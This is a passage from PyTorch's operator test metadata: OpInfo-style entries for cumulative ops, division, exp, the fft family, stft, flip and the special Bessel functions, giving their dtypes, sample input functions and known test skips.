skips=( # cumsum does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), sample_inputs_func=sample_inputs_cumulative_ops), OpInfo('cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # cumprod does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), # gradgradcheck fails in fast_mode=True: #56275 sample_inputs_func=sample_inputs_cumprod, gradcheck_fast_mode=False), OpInfo('cummax', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('cummin', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), UnaryUfuncInfo('deg2rad', ref=np.radians, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), )), OpInfo('diff', op=torch.diff, # np.diff has np._NoValue as default values for prepend and append, compare_with_reference breaks if prepend/append # are set as None when converting to numpy ref=lambda input, n=1, dim=-1, prepend=np._NoValue, append=np._NoValue: ( np.diff(input, n, dim, np._NoValue if prepend is None else prepend, np._NoValue if append is None else append) ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diff), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='no_rounding_mode', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True),), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='trunc_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="trunc")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='floor_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="floor")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('true_divide', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, rhs_make_tensor_kwargs=dict(exclude_zero=True)), UnaryUfuncInfo('exp', ref=np_unary_ufunc_integer_promotion_wrapper(np.exp), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Reference: https://github.com/pytorch/pytorch/pull/50093#pullrequestreview-561791547 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), # Reference: https://github.com/pytorch/pytorch/issues/48010 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('expand', op=lambda self, shape: self.expand(shape), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_expand, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('expand_as', op=lambda self, other: self.expand_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_expand_as, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),), ), OpInfo('diag', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diag, error_inputs_func=error_inputs_diag), OpInfo('diag_embed', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal', # They are not strictly aliases as they have diverging defaults, but we can see them as aliases for testing purposes # If we add tests that test the function against the alias, make linalg.diagonal into its own OpInfo aliases=('linalg.diagonal',), aten_backward_name='diagonal_backward', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal_scatter', dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_scatter), BinaryUfuncInfo('eq', ref=np.equal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), always_returns_bool=True, supports_autograd=False, sample_inputs_func=sample_inputs_comparison_ops), BinaryUfuncInfo('fmax', op=torch.fmax, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmin', op=torch.fmin, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmod', ref=np.fmod, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), BinaryUfuncInfo('remainder', ref=np.remainder, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, operator_variant=operator.mod, inplace_operator_variant=operator.imod, supports_one_python_scalar=True, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), # Fails on XLA # False is not true : Tensors failed to compare as equal! # Attempted to compare equality of tensors with different dtypes DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), )), UnaryUfuncInfo('frac', ref=lambda x: np.modf(x)[0], dtypes=floating_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.bfloat16, torch.float16, torch.float32, torch.float64)), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.float32, torch.float64)), )), SpectralFuncInfo('fft.fft', aten_name='fft_fft', ref=np.fft.fft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), SpectralFuncInfo('fft.fft2', aten_name='fft_fft2', ref=np.fft.fft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.fftn', aten_name='fft_fftn', ref=np.fft.fftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.hfft', aten_name='fft_hfft', ref=np.fft.hfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False), SpectralFuncInfo('fft.hfft2', aten_name='fft_hfft2', ref=scipy.fft.hfft2 if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.hfftn', aten_name='fft_hfftn', ref=scipy.fft.hfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd'), ], ), SpectralFuncInfo('fft.rfft', aten_name='fft_rfft', ref=np.fft.rfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, skips=( ), check_batched_gradgrad=False), SpectralFuncInfo('fft.rfft2', aten_name='fft_rfft2', ref=np.fft.rfft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.rfftn', aten_name='fft_rfftn', ref=np.fft.rfftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.ifft', aten_name='fft_ifft', ref=np.fft.ifft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)),), SpectralFuncInfo('fft.ifft2', aten_name='fft_ifft2', ref=np.fft.ifft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ifftn', aten_name='fft_ifftn', ref=np.fft.ifftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.ihfft', aten_name='fft_ihfft', ref=np.fft.ihfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), skips=( ), check_batched_grad=False), SpectralFuncInfo('fft.ihfft2', aten_name='fft_ihfft2', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=( # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), DecorateInfo(precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd'), # Mismatched elements! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warnings'))), SpectralFuncInfo('fft.ihfftn', aten_name='fft_ihfftn', ref=scipy.fft.ihfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archss dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), check_batched_grad=False, check_batched_gradgrad=False, decorators=[ # The values for attribute 'shape' do not match: torch.Size([5, 6, 5]) != torch.Size([5, 6, 6]). DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out_warning'), # Mismatched elements! DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo( precisionOverride({torch.float: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfft', aten_name='fft_irfft', ref=np.fft.irfft, ndimensional=SpectralFuncType.OneD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False), SpectralFuncInfo('fft.irfft2', aten_name='fft_irfft2', ref=np.fft.irfft2, ndimensional=SpectralFuncType.TwoD, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.irfftn', aten_name='fft_irfftn', ref=np.fft.irfftn, ndimensional=SpectralFuncType.ND, supports_forward_ad=True, supports_fwgrad_bwgrad=True, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 1e-4, torch.cfloat: 1e-4}), 'TestFFT', 'test_reference_nd')], ), OpInfo('fft.fftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('fft.ifftshift', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half), sample_inputs_func=sample_inputs_fftshift, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), OpInfo('stft', decorators=[ skipCPUIfNoFFT, DecorateInfo(unittest.skip("Skipped! stft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_forward_ad'), ], dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_stft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL, ), OpInfo('istft', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_istft, supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_forward_grad=False, check_batched_grad=False, check_batched_gradgrad=False, supports_out=False, decorators=( DecorateInfo(unittest.skip("Skipped! istft does not match the native function"), 'TestJit', 'test_variant_consistency_jit'), ), skips=( skipCPUIfNoFFT, # gradcheck fails on ROCm (gh-68429) # grad is computed improperly (probably for weights tensor) DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), )), UnaryUfuncInfo('floor', ref=np.floor, dtypes=floating_types_and(torch.bfloat16), dtypesIfCUDA=floating_types_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, assert_autodiffed=True), OpInfo('flip', op=torch.flip, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_flip, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('fliplr', op=torch.fliplr, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_fliplr, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('flipud', op=torch.flipud, dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_fliplr_flipud, error_inputs_func=error_inputs_flipud, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('sparse.sampled_addmm', dtypes=floating_and_complex_types(), supports_autograd=True, sample_inputs_func=sample_inputs_sparse_sampled_addmm, decorators=[ skipCUDAIf(_get_torch_cuda_version() < (11, 3), "cusparseSDDMM was added in 11.2.1"), skipCPUIfNoMklSparse, ], skips=( # NotImplementedError: Tensors of type SparseCsrTensorImpl do not have is_contiguous DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_noncontiguous_samples'), # RuntimeError: Sparse CSR tensors do not have strides. DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out'), # RuntimeError: sampled_addmm: Expected result to have sparse csr layout, but got Strided DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out_warning'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_operator'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestCompositeCompliance', 'test_backward'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_conj_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestMathBits', 'test_neg_view'), # RuntimeError: Sparse CSR tensors do not have strides DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # RuntimeError: unsupported memory format option Preserve DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_grad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_fn_gradgrad'), # GradcheckError: gradcheck expects all tensor inputs are dense when check_sparse_nnz is set to False DecorateInfo(unittest.skip("Skipped!"), 'TestGradients', 'test_forward_mode_AD'), )), UnaryUfuncInfo('i0', ref=np_unary_ufunc_integer_promotion_wrapper( scipy.special.i0) if TEST_SCIPY else _NOTHING, aliases=('special.i0',), decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 5e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_i0_i1, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), )), UnaryUfuncInfo('special.i0e', aten_name='special_i0e', ref=scipy.special.i0e if TEST_SCIPY else _NOTHING, decorators=(precisionOverride({torch.bfloat16: 3e-1, torch.float16: 3e-1}),), dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), backward_dtypes=floating_types(), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.i1', aten_name='special_i1', ref=np_unary_ufunc_integer_promotion_wrapper(scipy.special.i1) if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, decorators=( DecorateInfo(toleranceOverride({ torch.float32: tol(atol=1e-4, rtol=0), torch.bool: tol(atol=1e-4, rtol=0)})), ), skips=( DecorateInfo(unittest.skip("Incorrect result!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.int8,)), ), supports_fwgrad_bwgrad=True, supports_forward_ad=True), UnaryUfuncInfo('special.i1e', aten_name='special_i1e', ref=scipy.special.i1e if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool), dtypesIfCUDA=all_types_and(torch.bool), sample_inputs_func=sample_inputs_i0_i1, supports_forward_ad=True, supports_fwgrad_bwgrad=True), UnaryUfuncInfo('special.ndtr', aten_name='special_ndtr', decorators=(precisionOverride({torch.bfloat16: 5e-3, torch.float16: 5e-4}),), ref=scipy.special.ndtr if TEST_SCIPY else _NOTHING, dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Dispatch stub: unsupported device typemeta DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_fwgrad_bwgrad', device_type='meta'), )), BinaryUfuncInfo('floor_divide', ref=_floor_divide_np, dtypes=all_types_and(torch.half, torch.bfloat16), supports_autograd=False, rhs_make_tensor_kwargs=dict(exclude_zero=True), supports_two_python_scalars=True, skips=( # AssertionError: Results of original model and exported/imported version of model differed DecorateInfo(unittest.skip('Skipped!'), 'TestJit', 'test_variant_consistency_jit'), # bfloat16 floor_divide compared with a float32 reference works inconsistently DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', dtypes=(torch.bfloat16,)), # int8 floor divide has different results for -128 // -1 vs. NumPy DecorateInfo(unittest.skip('Skipped!'), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.int8,)), # The following tests fails on some jobs 